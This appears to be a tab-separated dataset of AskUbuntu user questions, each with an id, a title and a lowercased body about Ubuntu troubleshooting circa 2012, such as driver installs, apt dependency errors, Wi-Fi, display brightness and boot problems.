215284	libdvdread : ca n't seek to block	i am trying to read a dvd . libdvdcss is installed . vlc plays the dvd fine for about 20 minutes before stopping suddenly . totem , acidrip , dvd : :rip all fail . i think that lsdvd sums up the problem : $ lsdvd libdvdread : using libdvdcss version 1.2.12 for dvd access libdvdread : ca n't seek to block 2002266 libdvdread : ca n't seek to block 2002266 libdvdread : ca n't seek to block 3740904 libdvdread : ca n't seek to block 3740904 libdvdread : invalid ifo for title 2 ( vts_02_0.bu ) . ca n't open ifo 2 ! what is going wrong ? the dvd has no scratches .
215290	unable to install cedarview-drm	i 've been trying to install intel binary xorg driver for gma3600 ( cedarview ) gpus for my acer aspire one d270 with windows 7 starter , windows 8 , and ubuntu 12.04 i 've followed these instructions verbatim , but i get the following errors on step 3 when i try to install the cedarview drivers : the following packages have unmet dependencies : cedarview-drm : i386 : depends : grub-gfxpayload-lists : i386 but it is not going to be installed depends : linux-headers-generic : i386 ( > = 2.6 ) but it is not going to be installed or linux-headers-generic-pae : i386 ( > = 2.6 ) but it is not going to be installed depends : dkms : i386 ( > = 2.1.0.0 ) but it is not installable cedarview-graphics-drivers : i386 : depends : xserver-xorg-core : i386 ( > = 2:1.10.99.901 ) but it is not going to be installed depends : xorg-video-abi-11 : i386 e : unable to correct problems , you have held broken packages . i tried and successfully install one of the packages by myself : sudo apt-get install libva-cedarview-vaapi-driver but when i tried to install : cedarview-drm by myself , i get the following error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may also help to resolve the situation : the following packages have unmet dependencies : cedarview-drm : i386 : depends : grub-gfxpayload-lists : i386 but it is not going to be installed depends : linux-headers-generic : i386 ( > = 2.6 ) but it is not going to be installed or linux-headers-generic-pae : i386 ( > = 2.6 ) but it is not going to be installed depends : dkms : i386 ( > = 2.1.0.0 ) but it is not installable e : unable to correct problems , you have held broken packages . if anyone can shed some light on this , i 'd be very grateful . i 'm just so lost ... and i 'd like to get this working as i 'm not liking windows 8 or 7 . thanks .
215298	unable to install skype on 64bit ubuntu	i am receiving the following message while i am trying to install skype : nidhin @ ubuntu : ~ $ sudo apt-get update nidhin @ ubuntu : ~ $ sudo apt-get install skype reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin but it is not installable e : unable to correct problems , you have held broken packages how can i fix this ?
215300	how to turn off the graphics adapter on a lenovo g570 ?	i have ubuntu running on my lenovo g570 , how can i turn off my radeon graphics card , which is getting heated up a lot while i use it .
215304	macbook pro late 2011 screen brightness issue	the keys to set the screen brightness work properly but everytime i reboot , the screen brightness is reverted to 100 % , which is very annoying . i 've already tried to add the following lines to /etc/rc.local but with no success ( only the keyboard backlight stays off ) : # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . echo '1 ' > /sys/devices/platform/applesmc.768/leds/smc : :kbd_backlight/brightness echo '6 ' > /sys/class/backlight/acpi_video0/brightness rfkill block bluetooth exit 0` this worked for me when i was using ubuntu 12.04 and also did after the upgrade to 12.10 but then after rebooting the screen brightness always reverted to 100 % . would be nice if anyone knows how to fix this . my device : macbook pro 13 '' late 2011 thanks in advance !
215306	desktop content no longer visible after upgrade to 12.10	after i upgraded from ubuntu 12.04 to 12.10 contents of my desktop directory are no longer displayed on desktop . how do i fix that ?
215308	will not install - 12.10 desktop	just purchased 12.10 dvd but does not progress once the continue button is slected on the preparing to install ubuntu screen . cursor indicates activity but no disk or cd activity . am installing to replace mandriva 2009 . machine cpu is an old amd athlon xp 2000+ ( 1.6ghz ) with 1g ram . 5g space available and network connected . tried all 3 copies provided and no difference . help - mark s
215313	how do i startup the computer with an alarm and run a scheduled program ?	i want to start my torrent downloading at night after 11 pm so i need my computer to start automatically at 11 pm and then log in to an account and start a torrent program . i know that i can start up my computer at a specific time in bios but the problem is automatically logging in the system . how can i do that ?
215318	usb keyboard not recognized immediately	i 'm having a problem with a deltaco tb-229 usb keyboard when booting to peppermint os three . as that is based on ubuntu , i ask the question here , hope that is fine . the keyboard has worked flawlessly in windows 7 ( it 's a dualboot machine ) . when i boot into linux , the keyboard does not react ( ca n't login as i ca n't type the password ) . however , if i switch it to another usb port , it immediately works and there are no problems for the duration of that session . next time i reboot , though ... same thing . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 05e3:0606 genesys logic , inc. usb 2.0 hub / d-link dub-h4 usb 2.0 hub bus 002 device 002 : id 046d : c517 logitech , inc. lx710 cordless desktop laser bus 002 device 003 : id 05d5:0624 super gate technology co. , ltd i think the deltaco is the last in this list generated with lsusb . should i add something to a script run at startup , before the login screen ? i am a newbie ... thanks in advance , j .
215325	recovery of data after installing ubuntu 12	i had been using ubuntu paralally with windows before.this time i had only win 7 and i decided to replace it with ubuntu thinking that it will retain the data on other drives ( the ones in which windows was not installed.. ) seems like my entire disk has been erased and taken over by this new system . how can i get my data back ? ( preferably not wanting to switch back to windows )
215330	how do i get a broadcom wireless bcm43225 card working ?	during the installation of my ubuntu 12.10 i could use the wireless connection for extra updates . after the installation i updated ubuntu and it installed 74 new updates , after that no wireless connection ( say what ! ) . so i did try some stuff , i followed the tutorial to load the windows drivers using ndiswrapper ( https : //help.ubuntu.com/community/wifidocs/driver/ndiswrapper ) but i always get that the ndiswrapper module is not loaded ( but i did install the extra 3 packages , still doesnt work ) . ndiswrapper-source ndiswrapper-dkms ndiswrapper-common please somebody help ! thanks a lot
215336	showing slide show in the projector	i successfully plugged in the projector in to my acer 8930g computer , but when i 'm tryng to show the slide show ( like in image viewer or libreoffice impress ) , it begins in my laptop , though i 'd like to start it in the projector screen . how can i show a slide show on the external display ? at my school , where windows and ms office are used , there 's also problems like this .
215339	how to use unity-2d-panel standalone with global menu	can anyone tell me how to use only unity-2d-panel with global menu . when i load only unity-2d-panel i have problems with global menu , for example : i have close , minimize and maximize buttons on unity panel and on window title bar . i think it 's a bug . so can you help me fixing it .
215340	number of processes named 'doodle '	i have been using 12.10 for a few days . just upgraded it from 12.04 . my computer , which has a 4gb ram and 64 bit intel processor , just goes slow randomly . when i press ctrl+alt+f6 and login through a command prompt , i see a number of processes using ps -a. i get many instances of a process named 'doodle ' running . so many that i have to pkill them by hand . any idea why this is happening ?
215351	how to install macbuntu in 12.10 ?	how to install macbuntu in ubuntu 12.10 ? currently , there are no updates for macbuntu . the last update is only for ubuntu 10.10 . is there any way to install the great macbuntu in ubuntu 12.10 ?
215359	how to compile and install clamav from surceforge ?	i 'm using ubuntu 10.04 . i 'm affraid i 've installed a virus on my computer ( i 've clicked a link which was a virus ) , i 'd prefere to check if everything is fine . i 've installed clamav using synaptic . the installed version was 0.96.5 , while the most recent version is 0.97.6 . when i was trying to update virus database , i got a warning that the version of clamav i 'm using is outdated . since i did n't know how to update the software by synaptic or apt ( both show the installed version as the newest ) i 've uninstalled all and downloaded the recent version from sourceforge . i 've unpacked the tar.gz archive , entered the folder but when i type ./configure i 'm getting the message : configure : error : please install zlib and zlib-devel packages when i type sudo aptitude install zlib zlib-devel the terminal output says there is no such packages ( there is no package zlib-devel and there is many packages which name contain zlib ) . i suppose the link contained probably the windows virus , but i 'd prefere to make sure there is nothing in my computer . as well as i 'm not sure if the virus , even without harming my system , can send itself to my e-mail contacts or not .
215360	unable to install anything from software center - package issues in 12.10 - fresh intallation	i was having 12.04.1 lts till now , and decided to install 12.10 . i did a `` new installation '' by choosing to remove the existing 12.04 and fresh install 12.10 ( using the options presented during installation process ) . everything went fine , and quantal is up and running . first thing i did after logging into quantal is fire up the software center . i got to gnome shell page in the sc and clicked on install and i got error saying there are package dependencies to be resolved . ok . i next searched for synaptic , and clicked on install , and again error . error while trying synaptic : it keeps checking the software sources for about 10 secs , and then shows : failed to download repository information , check your internet connection . the /etc/apt/sources.list looks like this now : # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http : //archive.archive.ubuntu.com/ubuntu/ quantal main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http : //archive.archive.ubuntu.com/ubuntu/ quantal-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.archive.ubuntu.com/ubuntu/ quantal universe deb-src http : //archive.archive.ubuntu.com/ubuntu/ quantal universe deb http : //archive.archive.ubuntu.com/ubuntu/ quantal-updates universe deb-src http : //archive.archive.ubuntu.com/ubuntu/ quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.archive.ubuntu.com/ubuntu/ quantal multiverse deb-src http : //archive.archive.ubuntu.com/ubuntu/ quantal multiverse deb http : //archive.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb-src http : //archive.archive.ubuntu.com/ubuntu/ quantal-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //archive.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //security.ubuntu.com/ubuntu quantal-security main restricted deb http : //security.ubuntu.com/ubuntu quantal-security universe deb-src http : //security.ubuntu.com/ubuntu quantal-security universe deb http : //security.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //security.ubuntu.com/ubuntu quantal-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu quantal main deb-src http : //extras.ubuntu.com/ubuntu quantal main
215361	how to touch close window at ubuntu on nexus 7	ubuntu on nexus 7 , the button of close everyone window is pretty smaller , i ca n't close window by this smaller button.i want to close window by touch , like drag and so on .
215362	bluetooth modem not working after certain time	i am using a nokia n72 as modem via bluetooth with my ubuntu 12.10 laptop . it gets connected without any trouble , but after sometime a network disconnection notification is shown and the connection name disappears from the network manager notification icon . it happens very rapidly . then i have to stop and restart network-manager with the command : 'sudo stop network-manager' and 'sudo start network-manager ' . is there any way to get rid of this irritating process ?
215363	how to tag and manage my manga comic collection ?	i have a large number of manga ( japanese comics ) loosely organized in compressed folders per story , which i sorted into folders by the category of authors . is there an application that could add tags to each story/compressed folder to indicate , for example , the manga 's genre ( romance , drama , tragedy , adventure ) so if i want to search for manga which have adventure i can easily find them ? particularly , is there an application which has a gui and is not run in the terminal ? i 'm not that good at using terminal commands .
215364	how can i add the softwares i have installed from usc of kubuntu 12.04 into kubuntu 12.10 iso installation file	i am currently using kubuntu 12.04 . i do n't have strong high speed internet connection and managed to get kubuntu 12.10 . i found that it 's size is about 1gb . i have a lot of softwares installed in my current kubuntu 12.04 via ubuntu software center i would like to add these software to kubuntu 12.10 installation iso file . i do n't want to download packages from ubuntu customization kit ( uck ) or similar software . i do n't prefer using aptoncd or similar software . what i want is to add these software into this kubuntu 12.10 , so that they appear along with the default application which will be installed as default when the os is installed . is this possible ?
215367	learning how to use python in ubuntu ?	i 've recently installed ubuntu 12.04 on my oldie thinkpad , along with python-interpreter idle and obviously python . i 'm looking to learn the basics of this programming language , but i 've had no luck finding a conclusive beginners guide for the most recent python that does n't require knowledge of previous coding language . i know how to use the gui and use terminal for installation or basic tasks , and i have a basic knowledge of basic ( goto , print , input , if , next , etc . ) but absolutely no knowledge of python or any other coding . if someone could briefly explain or point me in the right direction to a guide , that would be great ! also , if anyone can recommend a better language to start off with for a beginner , i would be very interested . however , from what i 've researched it seems python is the most supported cross-platform and in general ? thanks in advance .
215368	installation errors on all installs after installing an i386 package on a 64 bit system	i am just setting up a new install of ubuntu 12.04.1 x64 i need to log on to my workplace citrix so installed the icaclient . unfortunately i accidentally clicked the i386 file first time around instead of the amd64 version on the citrix download page . software manager tried to install it anyway . it did not show up as installed after it failed so i proceeded with the amd64 install . at the end of the install i got a similar error output to the one below . i closed it and proceeded to see if it had installed . all works fine - no problem logging on to citrix server . the problem is that all subsequent installations with software manager is producing the same error as below . this last one is following installation of hplip toolbox . but all the apps so far install work so the problem cant be too serious , just very anoying and puzzling . can anyone please advise what the problem is and how to fix this ? should i un-install icaclient completely via software manager and start again or will this miss the erroneous i386 packages ? is there a way to purge the i386 stuff without affecting the amd64 packages ? its a shame not to have a new install not working perfectly : - ( installarchives ( ) failed : selecting previously unselected package libqt4-designer . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 173813 files and directories currently installed . ) unpacking libqt4-designer ( from ... /libqt4-designer_4 % 3a4.8.1-0ubuntu4.3_amd64.deb ) ... selecting previously unselected package libqt4-help . unpacking libqt4-help ( from ... /libqt4-help_4 % 3a4.8.1-0ubuntu4.3_amd64.deb ) ... selecting previously unselected package libqt4-scripttools . unpacking libqt4-scripttools ( from ... /libqt4-scripttools_4 % 3a4.8.1-0ubuntu4.3_amd64.deb ) ... selecting previously unselected package libqt4-test . unpacking libqt4-test ( from ... /libqt4-test_4 % 3a4.8.1-0ubuntu4.3_amd64.deb ) ... selecting previously unselected package libqtassistantclient4 . unpacking libqtassistantclient4 ( from ... /libqtassistantclient4_4.6.3-3ubuntu2_amd64.deb ) ... selecting previously unselected package libqtwebkit4 . unpacking libqtwebkit4 ( from ... /libqtwebkit4_2.2.1-1ubuntu4_amd64.deb ) ... selecting previously unselected package python-sip . unpacking python-sip ( from ... /python-sip_4.13.2-1_amd64.deb ) ... selecting previously unselected package python-qt4 . unpacking python-qt4 ( from ... /python-qt4_4.9.1-2ubuntu1_amd64.deb ) ... selecting previously unselected package python-qt4-dbus . unpacking python-qt4-dbus ( from ... /python-qt4-dbus_4.9.1-2ubuntu1_amd64.deb ) ... selecting previously unselected package hplip-gui . unpacking hplip-gui ( from ... /hplip-gui_3.12.2-1ubuntu3.1_all.deb ) ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for man-db ... setting up icaclient : i386 ( 12.1.0 ) ... dpkg : error processing icaclient : i386 ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up libqt4-designer ( 4:4.8.1-0ubuntu4.3 ) ... setting up libqt4-help ( 4:4.8.1-0ubuntu4.3 ) ... setting up libqt4-scripttools ( 4:4.8.1-0ubuntu4.3 ) ... setting up libqt4-test ( 4:4.8.1-0ubuntu4.3 ) ... setting up libqtassistantclient4 ( 4.6.3-3ubuntu2 ) ... setting up libqtwebkit4 ( 2.2.1-1ubuntu4 ) ... setting up python-sip ( 4.13.2-1 ) ... setting up python-qt4 ( 4.9.1-2ubuntu1 ) ... setting up python-qt4-dbus ( 4.9.1-2ubuntu1 ) ... setting up hplip-gui ( 3.12.2-1ubuntu3.1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : icaclient : i386 error in function : setting up icaclient : i386 ( 12.1.0 ) ... dpkg : error processing icaclient : i386 ( -- configure ) : subprocess installed post-installation script returned error exit status 2
215370	how can i add a custom item to the nautilus context menu , but not in a sub-menu ?	i am interested in adding a custom script to the nautilus context menu . i am aware of solutions such as the scripts folder and the nautilus actions application . i created a test action in nautilus actions , but it only appears under the `` nautilus-actions actions '' submenu . i would like to be able to add an item to the root level of the context menu itself ( at the same level as cut , copy , dropbox , compress ... ) and not in a submenu . is this possible with nautilus actions ? if it is n't , is there any other way ? ( if it involves coding or strange configuration changes , that 's ok too )
215371	launch a program when x starts	i want to launch a program when x ( not unity/gnome/etc ) starts . in particular , i want to launch xset r 105 when lightdm starts . is there a way to do it ? i tried writing this into ~/.xsessionrc : # ! /bin/bash xset r 105 but it did n't nothing .
215380	how to install on a laptop w/o internet access ?	i am trying to get software for a laptop we got for free but needs software on it . this laptop has no internet acess yet because of this . i have downloaded the file to my current desktop but how do i make a bootable usb if i do not have ubuntu on my pc ? do i need to make bootable dvd for this application ?
215382	after upgrading to 12.10 usb drives fail to mount	following upgrade to 12.10 , my usb drives - both pen drives and a usb hard drive - fail to mount with the error message : unable to mount *name of drive* volume adding read acl for uid 1000 to '/media/*my home file name* ' failed : operation not supported this is on a desktop dell inspiron 530 . i also have a dell inspiron mini 10 netbook which i also upgraded to 12.10 ( slightly smaller installation on a flash hard drive ) . all devices mount automatically without problems on this computer .
215388	changing default domain in mailutils	i have installed mailutils on ubuntu 12.10 and i have run into a problem where the domain being attached is the fully qualified host and not just the domain . for example , mail user2 [ enter ] then enter message and send produces a from address of user1 @ host.domain.com i want the from address to be just user1 @ domain.com . i did not have this problem in 12.04 , it only started when i upgraded to 12.10 . is there a system config file somewhere that would allow me to only set the domain.com as being added to the username when sending mail and not the full host name ? thanks , tim
215390	postgresql installation from graphical installed	i tried to install postgresql on ubuntu 12.04 64-bit . i have version pgsql9.1 on my windows machine and wanted to make both installation the same with the same components . i downloaded postgresql-9.1.6-1-linux-x64.run on my ubuntu but it does not want to start with package manager , i got this error : the file â/home/downloads/postgresql-9.1.6-1-linux-x64.runâ could not be opened . i thought it should go automatically with package manager or just run by itself . is there a way to install this package ?
215393	how do i report a bug on ubuntu one in windows 7 ?	hi i am using ubuntu one in windows 7 professional 32bit . it 's fresh installed just because i just got it from my university msdnaa . i installed ubuntuone from the website but i could n't login from the program . i have tried to login from website and it was successfull . i have tried close the program and tried to start again . but it even became more worse because the agreement button was disabled . i want to report bug but i do n't know because i 'm using windows right now . please help , some myworks are stored there . any help would be appreciated . thanks .
215394	ubuntu 12 slow on intel atom mini-itx board	i had an old intel desktop board d410pt ( mini-itx with atom processor ) that i decided to set up with linux and chose ubuntu 12.04 . seems its was a bad idea , because the 32 bit server version did not install at all , blew up at installing base . the desktop is installed , but takes 10s of seconds to react to mouse clicks . i have to watch while the menus paint 3 odd times ( getting more intense etc ) before i get an active menu . i read problems and lack of support for the board might be the issue . graphics chipset is intel速 gma 3150 if that helps . is there a version of ubuntu that will run on these old atom boards ? i actually just want to be able to run python as i am working on robotics doodles using ros and i just wanted to get away from vmplayer on my laptop . how far back do i need go ? do i need to move away from ubuntu ?
215397	wifi not working after updating 12.10	recently i installed ubuntu 12.10 alongside windows in a separate partition with ext3 file format . everything worked fine when i installed 12.10 at first . but after i updated the packages ( which was around 70mb ) , my wifi connections are n't shown . i can see bluetooth working fine , but i can not see any active wireless connections ( i have checked the `` enable networking '' also ) .
215402	usb mode mmx352g is not detected in ubuntu12.10 though installed gnome-ppp	i am using micromax 352g usb modem.ubuntu 12.10 is not detecting it as a modem device though it has shown it by the command `` lsusb '' . after running `` gnome-ppp '' , it shows an error report that /etc/modem have not been found . plz help ...
215409	ubuntu 12.10 wo n't start up now	i was upgrading from 12.04 to 12.10 when the battery went out on my laptop . once i plugged it back in and booted back up it goes to the ubuntu logo with the loading dots , but never moves past that point . how can i get my computer to start again ?
215412	how do i update the icedtea plugin on 12.10 ?	whenever i open up the page http : //www.runescape.com/game.ws ? in google chrome i get the notice , `` icedtea was blocked because it is out of date '' and gives me the two options of updating it or running this time . i 've gone to the link attached to the option of updating it and its a wikipedia page http : //icedtea.classpath.org/wiki/main_page that was n't helpful for me because i did n't know what to download and install . whenever i click , 'run this time ' it works momentarily but it is prone to have the runescape interface in the browser disappear and be replaced with a black screen .
215415	unity does n't load after installing nvidia drivers	if i install any of the proprietary nvidia drivers ( nvidia-* ) from the repositories , unity does not load after i log in . i just get a blank desktop background with no icons , panels or launchers . if i uninstall the drivers again , the desktop does load properly , but then certain games do n't work correctly . is there any way to resolve this ? thanks .
215418	i changed boot sequence but computer still boots to windows	i put the ubuntu .iso file onto a usb drive . i went into bios . i changed the boot sequence to put `` removable device '' first . i did everything the page asked me to do , but the computer did not seem to recognize there was anything else but windows when i restarted the computer . is there something else besides the iso file that i need ?
215423	delete ubuntu and grub from pc ( and bios unaccessible )	i 've really done a mess while upgrading 12.04 to 12.10 , or my pc did , or ubuntu did , i ca n't really tell . the situation now is i have a dual booting machine , windows 7 and ubuntu 12.10 -when turning on the pc , i ca n't access boot options , i 've tried every thing , esc , f1 f8 , f10 ( i have a hp pavilion ) but all i can see is a short-lasting screen with three lines reading something like `` error : files not found '' or `` link not found '' . so the pc turns to the grub loader screen . this is already a big problem . it means i ca n't change boot order , and i 'm diperate , since it doens n't seem that repairing my operating systems will bring my bios back . -if i chose ubuntu in grup , it loades but then frezes on the desktop , i may be having problem with unity3d , or compiz , which was reported to be crashing the first times i started ubuntu . now , after turning off and on the pc several times , no crash is reported again . ubuntu just load my background image and nothing else . not the side menu , not the header , nothing . althogh the system seems `` functioning '' , when i press the power button on the pc , for example , the normal shutdown dialog window appears . -if i chose windows , grubs tells me that something is not found , and to press any key to continue ; i do it and then windows loads perfectly . what i now want to do is 1- use easybsd to change boot order and boot windows partition first 2- delete the ubuntu partitions from within windows disk manager what i except happening is that my pc turns to , or near to factory booting settings : i press the power button and windows loads without asking me nothing i have acess to all my hardisk from withing windows is that what will really happen ? are there danger i 'm not seeing ? what i do n't except happening is the bios access key return functioning how could i eventually solve this ? i would like to reinstall ubuntu , 32 bit version this time .
215424	how to obtain a list of installed packages based on a backup ?	i have made a backup of my entire computer and i reinstalled the os right now . i know i should have listed dpkg -l to obtain a list of packages , but i have not done so . i only made a tarball of the entire disk . i wonder how i can find a list of packages based on this data . i would like to have the same packages installed that i had on my previous set-up . but there seems no longer a way to gain a list of packages , since i already reinstalled ubuntu on the computer and only have the tarball back-up .
215425	ubuntu 11.10 random reboots how to find root cause ?	all , this issue started with 11.04 , i upgraded to 11.10 this week in hopes it would correct it , but after a few days it happened again.. a few times a day , randomly , my monitors will go black and the machine will come back in the post screen and boot up again . sometimes it boots up properly , sometimes it boots to disk scan ( i understand why ... the machine just died with a bunch of stuff open ) and sometimes it takes several cycles of this to come up . i connected to the system with my laptop and tailed dmesg , syslog , kern.log , and xorg.0.log . i also ran a cat /proc/kmesg . nothing is showing up in any of these log files when it happens..it 's just like someone has pulled the plug . i just got through running 4 hours of the memory test with no errors . i have a amd phenom 9850 quad-core processor and nvida 9500gt graphics card . this system has been stable for like 4 years . i 'm thinking it might be a hardware problem , but how do i find out ? thanks ,
215433	what do i need to install to have this gui ?	a long time ago , i installed some tool to get a special gui effect ( see the following video ) : http : //www.youtube.com/watch ? v=hw7bcq_sslm or this link does anybody know what ubuntu package is related to ?
215439	after installing ubuntu 12.10 the desktop does not display correctly	i 've installed vmware player on my windows 7 in order to run ubuntu 12.10.. the ubuntu installation went well with no errors or display faults , but after restarting the vm at the end of the installation process i get the desktop with no visible sidebar or any menu bars at all.. they are active but the graphics is all black or corrupted . please help . thank you !
215443	changing $ path does n't work ?	i was trying to set path in etc/environment file , but after adding the desired path the $ path is showing an error in terminal : bash : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : no such file or directory here 's the content of environment file : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/monty/google_appengine '' i was trying to add the path to the folder google_appengine to the path as mentioned in this answer , but it does n't seem to work .
215448	install/upgrade the pdf viewer	my document viewer ( 3.4.0 , using poppler/cairo 0.18.4 ) says `` to view the full contents of this document , you need a later version of the pdf viewer . you can upgrade to the latest version of adobe reader from www.adobe.com/products/acrobat/readstep2.html for further support , go to www.adobe.com/support/products/acrreader.html '' while opening a pdf document . i 've fetched the install file ( adberdr9.5.1-1_i486linux_enu.bin ) from the above mentioned site and put on my desktop . how to install it ? thanks for the reply .
215450	strange behaviour working in netbeans ide 7.0.1 on java swing	i am using netbeans to code java swing . i am able to the see the gui when i run . but it says loading when i view the gui in netbeans ide before running . i get some kind of linkage error . anyone faced similar problems before ? ? error linkageerror : loader constraint violation : loader ( instance of org/netbeans/standardmodule $ onemoduleclassloader ) previously initiated loading for a different type with name `` org/w3c/dom/entityreference .
215457	i would like an explanation of each package in package list	i know that entering dpkg -- get-selections `` * '' > pkg.list gives a listing of the packages , but i would also like a brief explanation/description of what each of those packages does . is there a way to generate such a description ?
215459	displaying system information on desktop gnome3	i am looking for some extension which will display all system information such as cpu usage , temperature , internet usage , running processes etc . i would like to see all of the output continuously updated on my desktop . i run ubuntu 12.04 64-bit with gnome3 i know there are gnome3 extensions , but most of them ( at least what i checked ) display only some information on the bar . i am looking for complete set of possible informations and displaying them as a desktop background does anyone know something like that ?
215460	ubuntu 12.04 live usb installation hangs	i 'm trying to install ubuntu 12.04 on a macbook air 1,1 . i made a live usb stick using penguintosh ( the more common methods failed ) . now , the regular amd64+mac installation hangs the moment i click on the installer , with an endlessly spinning cursor and nothing else , although the live desktop works fine before that . i tried suspending the computer to unfreeze the hard disk , as recommended in one place , but that does n't solve the probblem the alternate install gives me a grub prompt and nothing else . typing `` boot '' at the command line gives the response `` error : no loaded kernel '' . can anyone help with either the regular or the alternate install ?
215462	compiz problems ( plugin missing , performance issues , development )	i 've recently set up the compiz cube again , and i was very happy to find that that flickering window glitch is gone ! however , the cube reflection and deformation plugins are also gone . i am running a fresh 12.10 install , and i have every compiz plugin package installed ( including compiz-plugins-extra , which supposedly contains everything that compiz-fusion-plugins-extra package used to have ) , but those two plugins are still missing . i have n't been able to find anyone with the same problem . any ideas ? ( thanks ! )
215464	ubuntu 12.10 manually installing catalyst 12.11 beta	hello i have problem with my driver . what i did , $ sudo apt-get update $ sudo apt-get install ia32-libs-multiarch i386 lib32gcc1 ia32-libs libc6-i386 ia32-libs $ sudo sh amd-driver-installer-catalyst-12.11-beta-x86.x86_64.zip -- buildpkg ubuntu/quantal $ sudo dpkg -i fglrx_9.010-0ubuntu1_amd64.deb $ sudo dpkg -i fglrx-dev_9.010-0ubuntu1_amd64.deb $ sudo dpkg -i fglrx-amdcccle_9.010-0ubuntu1_amd64.deb $ sudo aticonfig -- initial $ sudo reboot after reboot $ fglrxinfo and i get x error of failed request : badalloc ( insufficient resources for operation ) major opcode of failed request : 154 ( glx ) minor opcode of failed request : 3 ( x_glxcreatecontext ) serial number of failed request : 17 current serial number in output stream : 18 : _ ( here are my logs media.cdn.ubuntu-de.org/forum/attachments/08/45/5006157-terminal_log.txt media.cdn.ubuntu-de.org/forum/attachments/08/45/5006157-xorg.0.log media.cdn.ubuntu-de.org/forum/attachments/08/45/5006157-xorg.0.log.old module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed . my pc mainbaord : z77a-g14 gpu : amd/ati hd5850 festplatte:596gb western digital ram:18,0 gb dual-kanal ddr3 cpu : intel core i7 3770
215465	how to set two shortcuts for the same thing ?	i 'd like to be able to set chrome os like shortcuts for brightness and volume ( and some others ) , while keeping the default fn ones . is there anyway to achieve that ?
215467	debootstrap chroot installation error	during initial installation ( using both network installation and cd iso ) of ubuntu server 12.04.1 lts ( 64-bit ) as a guest vm on xenserver 6.1 i 'm getting this error : debootstrap warning warning : failure trying to run : chroot /target dpkg -- force-depends -- install /var/cache/apt/archives/debconf_1.5.42ubuntu1_all.deb any ideas ? just tried the same iso on virtualbox and it errored in the same way , although on different packages : base_files_6.5ubuntu6.2_amd64.deb and base-passwd_3.5.24_amd64.deb i 'm redownloading and trying another iso .
215470	apt-get update failed to fetch server	everytime when i do sudo apt-get update , i get always this error : hit http : //us.archive.ubuntu.com precise-backports/universe translation-en fetched 2,141 kb in 8s ( 255 kb/s ) w : failed to fetch gzip : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise_main_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise_universe_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise_universe_binary-amd64_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . i 'm running ubuntu server 12.04 lts .
215478	how to change keyboard layout on xfce ?	i 'd like to change and see the keyboard layout using xfce . is there any simple way to do that ? i had one when using gnome , but currently i want to use xfce .
215483	uninstall ubuntu 12.04 and install 11.04	i 'm a newbie to ubuntu . i have been using it as a dual boot on one laptop with ubuntu 11.04 i believe . i downloaded ubuntu 12.04 on my good laptop as a dual boot and it is really slow . i have plenty of needed memory and graphics and sound to be operating this . i have read this is an issue and i 'm really not sure if i can fix it without literally step by step instructions . i would like to uninstall 12.04 and install 11.04 .
